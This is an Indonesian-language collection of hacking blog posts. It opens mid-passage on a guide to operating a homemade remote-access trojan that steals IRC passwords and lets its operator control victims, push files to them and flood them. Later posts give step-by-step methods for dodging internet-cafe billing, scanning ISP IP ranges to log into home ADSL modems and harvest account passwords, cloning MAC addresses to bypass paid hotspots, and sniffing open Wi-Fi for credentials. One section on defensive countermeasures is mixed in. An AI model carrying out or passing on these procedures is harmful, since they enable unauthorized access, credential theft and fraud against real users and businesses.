ke #H.A.C.K (/windows –h #H.A.C.K) tanpa disadari. Korban dapat dikendalikan dengan

commands tertentu untuk melakukan flooding, cloning, join/part dari channel, Op/deOP dll.

Korban juga akan mengirimkan password nicknya ke #H.A.C.K setiap kali dia melakukan

/identify nick password.

• Trojan tidak ditampilkan di monitor korban (namanya juga Trojan) tetapi dapat dilihat melalui

Task Manager.

Anda dapat mematikan Trojan ini dengan sangat mudah. Hapus nilai registry-nya, restart komputer


dan delete filenya di C:\WINDOWS\system\services.exe. Kemampuan jahat server Trojan terpaksa

dibatasi mengingat keterbatan waktu. Mungkin saya akan menambahkan lagi beberapa opsi yang bisa

dilakukan Xremote untuk versi Update.

2. Instalasi dan penggunaan Client trojan (“Xremote.exe”)

“Xremote.exe”. Ini adalah “Client/Controller” yang perlu di-install ke komputer anda. “Xremote.exe”


tidak akan merusak sistem. Tidak ada perubahan nilai registry, menginjeksi maupun merubah

program lain di komputer anda seperti yang dilakukan “services.exe”.

Setelah selesai melakukan tahap penginstallan “client” di komputer. Anda dapat melihat tampilan

awal “Client” berikut di bawah ini :










Proses melakukan koneksi dan mengirim file ke komputer korban :

• Isi nama komputer atau alamat IP korban yang telah ditanamkan “services.exe” di kolom “IP

Address”, Isi port 1001 sebagai pintu masuk. Klik tombol “connect”. Jika berhasil maka anda


akan melihat tulisan “Status Connected” di kolom status.

• “Status : connected”. Ok saatnya menyusupkan sesuatu ke komputer korban (file seperti :

file.exe, file.jpg. dll). Pilih drive di komputer anda (kolom “Your Drive” partisi C:\ , D:\ ,Flashdisk, dll) lalu lokasi file yang hendak dikirim (kolom “Your Directory” dan kolom “Your


File”). Setelah itu tentukan lokasi dimana anda akan meletakkan file tersebut di komputer

korban (kolom “Target`s Directory\Folder to send”).

• Jika terkirim, anda akan melihat data jumlah byte dan file yang berhasil disusupkan ke

komputer korban.

• Jika kita ingin mengakhiri koneksi atau masuk ke komputer lain yang juga terinfeksi

“services.exe” klik tombol “stop” lalu ganti alamat IP-nya. Seandainya kita ingin konek


kembali ke komputer korban pertama yang telah disconnect sebelumnya, kita perlu melakukan

rebuild terhadap ‘services.exe”. Karena ketika kita disconnect dari komputer korban, trojan

juga akan menutup akses lalu lintas data dengan kita (“Client”). Masukkan lagi IP address dan

port 1001. lalu klik “rebuild”. Maka trojan akan melakukan self reload. Kok harus reload??

Tanya kenapa??hahahaha..

3. Tools tambahan Xremote:


Ghost Remote :







Jika kolom IP address kosong, isilah terlebih dahulu lalu klik “connect”, maka port 999 pada komputer

korban akan terbuka. Adapun yang dapat dilakukan oleh tool ini adalah:

• Open CDROM = membuka CD/DVD-ROM

• Close CDROM = menutup CD/DVD-ROM


• Freeze mouse = mengunci kursor mouse

• Free mouse = membuka kunci kursor mouse

• Hide TaskBar = menyembunyikan taskbar

• Show Taskbar = menampilkan taskbar

• Shut down = masa ga tau sih????

• DARK LORD = menghitamkan latar


• Ghost Shell = menjalankan program, membuka situs dll di komputer program (path harus diisi

dengan lengkap dan benar, misalnya C:\program files\mirc\mirc.exe).

Port Scanner :







Tool ini berfungsi untuk mengecek port-port apa saja yang aktif pada sebuah komputer.

Penggunaannya saya rasa rekan-rekan sudah tahu.

ICMP Flooder :








Tool ini berfungsi untuk melakukan ping flood secara brutal ke komputer target.

Bermain Warnet Gratis

loe Pada Mao Maen Warnet Gratisan?


Yuk Maen Warnet Gratis , Gratisan Maen Di warnet Yok Boy, Tapi Gimana Caranye? Pusing Gw ni Gak Punya Duit! Warnet Gratis Dimana Ya?

PUSING LOE KAN?? Ni Deh Gw Kasi Caranya, dapet dari nyari nyari juga ni:

Heey semuanyaaa! Berjumpa lagi dengan sayaa di tips dan trik! Hahahaaa… Di trik dan tips kali ini aku mau ngejelasin trik tips mengakali warnet dengan menggunakan ZHider! Di sini kita bakalan mencoba berinternet ria di warnet secara murah meriah!! Caranya gampaang! Kalian cuman perlu download Zhider di sini. Untuk selanjutnyaa, aku bakal ngejelasin dulu tentang sistem billing di warnet.


Contoh 
screen status yg ada di warnet (edelweis)

Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!

Berikut ini langkahnyaaa:

  1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
  2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
  3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
  4. Klo ada login screen, kamu login ajah kaya biasa.
  5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
  6. Klo ZHider dah dibukaa, langsung ajah logout.
  7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
  8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
  9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
  10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
  11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
  12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!
Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).

Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:


CTRL+ALT+Z Menyembunyikan jendela aktif

CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan

CTRL+ALT+L Menampilkan dialog zhider

CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…

Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!

Teknik Hacking Modem ADSL dan Account Speedy

Langkah Pertama

Buka aplikasi mIRC? pilih server Dalnet? dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Dalnet Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning. Lihat gambar dibawah ini.

Image

Langkah Kedua
Buka aplikasi Advanced Port Scanner v1.0 Beta 1, kemudian cari sebuah IP contoh 125.160.33.41 ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari 125.160.33.1-125.160.33.255, jadi angka yang diambil hanya 125.160.33. bukan 125.160.33.41 dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.

Image

Langkah Ketiga
Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda..

Image

Gambar diatas merupakan login dari modem PROLINK type H9200.

Image

Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkomspeedy.

Image

Maka kita akan melihat tampilan seperti dibawah ini:

Image

Untuk melihat password, cukup dengan klik kanan pada pop up diatas view page source. Kemudian cari kata passwd. Lihat hasil pada gambar berikut:

Image

Dari hasil diatas dapat dicoba di situs TelkomSpeedy untuk menguji account yang telah gw dapat. Accountnya adalah 161101201848@telkom.net dan passnya tetap saya hidden kan demi menjaga privacy yang punya account.

Image

Image

Semua ini merupakan pembelajaran mengenai dunia hacking, penulis tidak bertanggung jawab atas kerusakan yang terjadi akibat penyalahgunaan artikel ini

Membobol Password Hotspot



Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.
Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.


Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.

Apa itu MAC Adress ?

In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).

Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.

Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi.

Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok. Jenis proteksi yang digunakan adalah MAC Address Filtering.

Bagaimana menjebol Proteksi dengan MAC Address ?

Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://indoupload.net/files/8318/k-mac.zip




Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali

Lalu bagaimana bila akses Wireless dibuat dengan proteksi yang lain ? Seperti WEP Keys dan WPA/WPA2 Keys ? Itu akan saya bahas lain kali

Happy Free Surfing !komputer34.wordpress.com

Hack Mikrotik Hotspot






Satu lagi cara berinternet gratis yaitu dengan meng-hack hotspot mikrotik. Sebenarnya cara ini sudah basi, tetapi karena baru saja saya mempraktekan maka saya tulis langkah-langkahnya. Disamping untuk mengingat kalau lupa kan bisa untuk sharing buat yang lain, yang mungkin belum tahu atau masih kurang paham. Biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing. Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.



Berikut langkah-langkahnya :



1. Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. Netcut bisa didownload disini.

2. Koneksikan komputer kita dengan hotspot mikrotik

3. Jalankan program Netcut


4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard







5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi. Yang jelas bukan network kita atau network server.









6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.










7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.



8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C.









9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.









10. Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt


C:\>ipconfig/all



11. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.



12. Hasil :

Sebelum melakukan clone









Sesudah melakukan clone





ADMIN LOCKDOWN [Meruntuhkan Security Administrator]

Mau buka Registry, CMD, Gpedit, Folder options dll, tapi di disable sama adminnya ? atau bahkan Run nya juga di disable ?
Ngapain repot2 otak atik sana sini ….

Nih SEDOT !!!

hanya butuh 1 X klik maka yg didisable sama admin langsung ke buka (tanpa restart)


Tehnik Hacker menerobos Keamanan

Aktifitas hackers (*sesungguhnya yang saya maksudkan adalah crackers, tapi media massa telah salah mempopulerkannya*) adalah nyata dan menjadi ancaman serius yang terus menerus berkembang serta dapat mengganggu kegiatan bisnis. Mereka masuk dalam sistem internal perusahaan melalui sambungan internet / LAN atau kegiatan secara fisik lainnya yang memungkinkan mereka terhubung ke terminal komputer.


Berikut disampaikan secara umum beberapa tehnik yang biasa dipakai hackers untuk mendapatkan akses ilegal ke sumber daya komputer.
A. Mencuri akses log-in yang dipakai
Untuk melakukan akses ilegal ke dalam sistem komputer salah satunya adalah dengan mendapatkan akses log-in yang dipakai. Hal ini bisa dilakukan ketika hacker secara fisik berada di dekat fasilitas komputer atau berusaha mengakses sistem melalui koneksi dial-in.
1. Mencuri akses secara fisik : tahap penting dalam menjaga keamanan sistem informasi adalah menjamin bahwa akses secara fisik ke sumber daya komputer adalah terbatas. Orang dalam atau luar yang secara fisik mempunyai akses ke terminal komputer akan memiliki kesempatan mendapatkan log-in yang sedang digunakan.
2. Mendapatkan akses melalui dial-in : metode lain untuk mendapatkan akses log-in adalah dengan melakukan dial-in ke host. Program “daemon dialers”, yang banyak tersedia di internet, dapat mengidentifikasi ID modem yang sedang berlaku. Sekali hackers mengetahui ID modem suatu terminal/host, dia dapat melakukan dial-in dan mendapatkan akses log-in yang dipakai.
Untuk meminimalisir potensi pelanggaran akses log-in ini dapat dilakukan langkah-langkah :
- Terminal komputer diletakkan (secara fisik) ditempat yang aman;
- Pengamanan dan pengendalian akses yang baik dipasang pada semua jendela dan pintu tempat dimana hardware komputer berada;
- Komputer yang diletakkan diluar area yang diamankan dan terhubung ke jaringan perusahaan, harus menggunakan password yang baik;
- Mematikan modem ketika tidak digunakan;
- Menggunakan fasilitas call-back, memberikan ekstra otentikasi, atau menggunakan one-time password;
- Menghilangkan logo dan nama organisasi dari layar log-in untuk menghilangkan tanda pengenal, sehingga hackers tidak dapat mengetahui dengan cepat sistem mana yang dimasuki;
- Menggunakan alarm atau pesan peringatan saat pihak yang tidak berhak memasuki sistem dan mencatat aktifitasnya.
B. Mencuri password
Beberpa tehnik yang populer untuk mencuri password adalah :
1. Brute Force Attacks : merupakan usaha menebak password baik secara manual ataupun otomatis. Umumnya hackers memiliki daftar password yang berisi koleksi password default yang terpasang secara otomatis saat suatu program diinstal. Program penebak password banyak tersedia juga di internet.
2. Password cracking : merupakan program untuk mendapatkan password dengan memanfaatkan celah keamanan. Program ini banyak tersedia di internet, misalnya program Crack. Crack bekerja dengan cara menyandi kamus standar dan kemudian membandingkannya dengan password yang disandi oleh sistem sampai menemukan kata-kata yang cocok.
Untuk menghindari pencurian password dapat dilakukan langkah-langkah :
- Mem-password semua user account;
- Ganti default password segera setelah instal program;
- Gunakan kata-kata / frasa yang sukar ditebak;
- Ganti password secara periodik;
- User account yang sudah tidak terpakai segera dihapus;
- Password yang telah disandi disimpan dalam file yang terlindung dengan baik (disamarkan);
- Jangan menuliskan password didekat terminal komputer / work station;
- Usahakan hanya sedikit orang yang memiliki akses terhadap sistem administrator, untuk menghindari resiko peng-copy-an password yang sedang digunakan;
- Memberikan pengertian kepada user akan pentingnya mengelola, menjaga keamanan password yang dimiliki.


3. Keystroke logging : tehnik ini sangat sederhana dan hampir selalu tidak terdeteksi. Hackers dapat menggunakan sebuah disket untuk menginstal program key-stroke logging melalui work-station. Sekali program ini masuk ke dalam sistem, dia akan menetap di dalam sistem dan menangkap setiap sign-on berdasarkan kata kunci pembukanya. Hacker dapat memanfaatkan sign-on yang tertangkap tersebut dari jauh (remote location).
Untuk mencegah aksi ini :
- Gunakan one-time password untuk sign-on pada account dengan tingkat sensitif tinggi;
- Secara periodik lakukan scanning untuk mengetahui trojan atau malware lain yang terlanjur masuk kedalam sistem;
- Tempatkan hardware komputer di tempat yang terlindung dan diberi pembatasan akses.
4. Packet sniffing : program-program network monitoring tools seperti network analyzers dan packet sniffers tersedia sangat banyak di internet. Tool ini bekerja dengan cara menangkap paket data yang ditransmisikan melalui saluran komunikasi. Terkadang hacker juga melakukan packet sniffer dengan cara menghubungkan laptopnya ke port jaringan perusahaan, baru kemudian melakukan pencurian data.
Lalu-lintas data dalam jaringan hampir dapat dipastikan tidak dibungkus dengan metode penyandian yang baik, sehingga merupakan kesempatan emas bagi hacker untuk mendapatkan user account dan password yang ada di dalam jaringan.
Untuk mencegah dan meminimalisir akibat aksi packet sniffer :
- Jalur komunikasi sedapat mungkin dibagi dalam beberapa bagian;
- Data-data sensitif ditransmisikan melalui jaringan komunikasi dalam bentuk yang sudah disandi dengan metode penyandian yang baik;
- Menggunakan one-time password untuk sign-on pada account dengan tingkat yang sensitif;
- Akses kepada saluran komunikasi dan komputer, secara fisik dibatasi.
5. Social engineering : interaksi sosial yang mengabaikan keamanan informasi menjadi salah satu cara hackers untuk mendapatkan data sensitif secara langsung ataupun tidak langsung dari user.
Untuk mencegah kebocoran informasi melalui kegiatan ini :
- Secara periodik dilakukan penyegaran dan sosialisasi pentingnya menjaga keamanan informasi yang dimiliki;
- Melakukan pencatatan dan dokumentasi atas semua prosedur pengendalian akses;
- Membangun kesadaran pengamanan informasi di seluruh staf baik manajemen maupun operasional;
- Waspada terhadap pesan tipuan yang berisi “permintaan konfirmasi password”, “reset password” atau “lupa password”.
C. Metode lainnya untuk mencuri akses
1. IP address spoofing : adalah salah satu cara pengelabuan yang membuat untrusted host terlihat seperti trusted host dalam sebuah jaringan. Hal ini terjadi karena hackers merubah IP address host tersebut sehingga menyerupai trusted host. Dengan kata lain penyusup menipu host dalam jaringan sehingga penyusup tersebut tidak perlu melakukan otentikasi untuk dapat terhubung dengan jaringan lokal.
Untuk menangkal serangan ini dilakukan :
- Mengkonfigurasi firewall dan router sedemikian rupa agar dapat menangkal serangan IP spoofing;
- Hanya host yang dinyatakan aman yang diijinkan untuk terhubung ke dalam jaringan.
2. Terminal yang tidak dijaga : sering terjadi sebuah terminal dalam keadaan sign-on ditinggalkan oleh user, entah ke toilet atau istirahat makan. Bila kebetulan ada hacker yang secara fisik berada di tempat tersebut, maka hacker akan mempunyai kesempatan untuk mengakses data secara ilegal atau memasukkan trojan ke dalam sistem.
Untuk meminimalisir kejadian tersebut :
- Gunakan screen server yang dipasangi password, yang otomatis dijalankan setelah beberapa menit tidak ada aktifitas dalam sistem;
- Memberi pengertian pada user untuk selalu melakukan sign-off setiap kali meninggalkan terminal;
- Melakukan pengawasan ditempat dimana terminal tersebut berada.
3. Writeable set user ID files : beberapa sistem menyediakan sebuah file penyimpan user ID untuk mengakses terminal. Hacker akan mencari file yang diidentifikasikan sebagai set-user-ID (SUID) tersebut dan mencoba menuliskan kode tambahan kedalam SUID agar mendapatkan akses menuju root.
Untuk mencegah penyusupan ini :
- Dilakukan pembatasan terhadap program yang dapat mengakses SUID;
- SUID dikonfigurasikan sedemikian rupa sehingga hanya dapat diubah melalui root;
- Hanya user yang terdaftar dalam sistem yang dapat menulis di file SUID.
4. Laporan dari Computer Emergency Response Team (CERT) : CERT selalu memberikan laporan-laporan tentang celah keamanan yang teridentifikasi. Namun eksploitasi ini sering dimanfaatkan oleh pihak yang bermaksud jahat untuk mendapatkan keuntungan dengan memasuki sistem secara ilegal. Hackers selalu mengikuti laporan CERT ini untuk mengidentifikasi bugs baru dari suatu sistem.
Administrator jaringan dan profesional keamanan informasi perlu mengikuti dengan cermat laporan-laporan CERT, melakukan checksum untuk menguji hasil-hasil yang dilaporkan CERT sebelum diimplementasikan dan melakukan penutupan celah keamanan yang teridentifikasi.
5. Hackers bulletin board : hackers dari seluruh dunia saling bertukar informasi dalam internet melalui forum atau milis dan bahkan menerbitkan laporan/tulisan dalam buletin. Mereka membahas masalah celah keamanan, keamanan sistem informasi, berbagi tehnik dan program baru, atau bahkan membahas informasi sensitif milik organisasi tertentu.
Administrator dan profesional keamanan jaringan perlu juga secara teratur mengikuti perkembangan pembahasan di forum hackers, dengan tujuan memperkuat sistem keamanan informasi dalam organisasinya.
6. Software di internet : internet banyak sekali menyediakan program/tools yang dapat digunakan oleh administrator untuk membantu melindungi komputer dan membantu melakukan scanning celah keamanan. Namun tool tersebut juga dipakai para hacker untuk maksud yang sebaliknya.
Administrator jaringan perlu secara teratur melakukan audit terhadap sistemnya. Audit ini dapat dilakukan secara internal ataupun melalui konsultan independen. Selain itu secara reguler administrator perlu mengecek versi terakhir dari tool yang digunakan untuk membantu keamanan sistem. Serta pastikan setiap celah keamanan yang ditemukan telah diatasi dengan baik. -antz-

Hack wireless

WarDriving itu legal atau tidak tergantung untuk tujuan apa wardrivingiru dilakukan.
Tool yg biasa digunakan adalah Kismet, bs di donlot dari http://kismetwireless.net/  
Ethereal, ambil di http://ethereal.com/ dan tool
aircrack-ng http://aircrack-ng.org/ semua tool di atas untuk mesin Linux.
setelah semua diinstal, kita bisa mulai menggunakan. Jalankan Kismet
(sebelumnya ubah dulu modus wireless card ke modus monitor). 
Kismet dng mudah menemukan berbagai access point yg ada. Jika kita lihat keterangan
access point yg ada Encrypt : No dan otentifikasi Open, kita bisa masuk ke dlm access 
point tersebut. lalu kita gunakan tool ethereal dan aircrack-ng untuk capture 
paket-paket data yg lewat. dengan status Encrypt : No,tentu
saja kita bisa melihat apa saja data para username !!! termasuk passwd dan 
username kalo tool ethereal ini, aq sering pakai juga. dia juga bisa kok menangkap paket d
ata dalam jaring LAn (pake kabel)

Hacking wireless hotspot dengan backtrack

Artikel ini tidak cocok jika saat melakukan koneksi, sistem meminta Anda untuk 
memasukkan encryption key. Artikel ini tidak cocok jika saat membuka website Anda 
dihadapkan pada halaman yang meminta Anda untuk memasukkan username dan password. 
tapi jangan buru-buru berhenti dulu membaca artikel ini, siapa tahu di tempat dan 
waktu yang lain Anda menemukan kasus yang sama. Artikel ini hanya bisa dipraktikan 
jika hotspot yang mempunyai wireless security berupa Mac Address filter. Ok..  mari 
kita mulai 
Siapkan alat dan bahan berikut : (kayak mau praktikum di lab aja, he2x) 
*Laptop yang support WLAN ( boleh juga pake PC dgn usb-wlan klo Anda kuat 
menentengnya ke mana-mana  
*Backtrack 2 Live CD (Penerus dari Linux Auditor
*Mac changer for windows seperti a-Mac Address Change  
Langkah-langkah:
1. Hidupkan laptop Anda  dengan booting dari CD/DVD
2. Masukkan CD Backtrack tunggu sampai sistem ready dan masukkan login : root dan password: toor
3. Ketikkan "start" tanpa tanda kutip.
4. Setelah X-Windows nya Backtrack muncul klik tombol KDE -> Backtrack -> Radio Network Analysis -> 8211 -> all -> airodump
5. Pada command line ketik : airodump-ng eth1 (sesuaikan dengan device Anda yang aktif)
6. Tentukan target ESSID yang diinginkan dan catat Mac Address client yang terhubung ke ESSID target 
7. Ubah Mac Address wlan Anda dengan cara klik tombol KDE &-> Backtrack -> Radio Network Analysis &-> 80211 -> all -> mac change 
8. klik tombol KDE &-> Internet -> Wireless Assistant untuk mencoba konek ke ESSID target.
9. Reboot Backtrack dan booting dari windows, kemudian install a-Mac Address Change dan ubah Mac Address Wlan Anda.
10. Tes koneksi ke ESSID target

Widget/Gadget Gratis Untuk Melacak Alamat IP Address Komputer Pengunjung Blog

Ini adalah salah Widget/gadget gratis untuk melacak dan menampilkan alamat IP address komputer pengunjung blog.
IP tracker

Situs yang menyediakannya adalah sebuah sirus berbahasa belanda (...kayanya ya, habis ga ngerti bahasanya sih :-)). Untuk mendapatkan kode HTML nya, Silahkan klik link ini. Setelah masuk ke situsnya, klik link Lesen Sie, wie einfach der Banner verwendet wird ...
wie ist meine ip.de
Setelah itu pilih bentuk gadget yang ingin ditampilkan dan kopi kode HTML-nya. Gadget disediakan dalam 2 bahasa ya, bahasa belanda dan bahasa inggris. IP Tracker Widget
Lalu masuk ke Blogspot --> Tata Letak --> Elemen Halaman, klik link Tambah Gadget ditempat yang ingin dipasangi gadget gratis untuk melacak dan menampilkan alamat IP address komputer pengunjung blog.sementara0
Pilih HTML/JavaScript, lalu paste kode html yang didapat tadi dan klik tombol simpan dan selesai.sementara1 sementara3
Sekarang blog telah memiliki gadget untuk melacak dan menampilkan alamat IP address komputer pengunjung blog